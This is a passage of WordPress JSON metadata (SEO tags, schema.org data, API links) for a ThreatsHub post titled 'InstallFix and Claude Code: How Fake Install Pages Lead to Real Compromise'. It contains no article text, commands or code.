Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","og_locale":"en_US","og_type":"article","og_title":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2026-05-05T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise","datePublished":"2026-05-05T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"},"wordCount":3413,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : 
Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","url":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","name":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","datePublished":"2026-05-05T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced 
Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60590","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=60590"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60590\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=60590"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=60590"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=60590"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}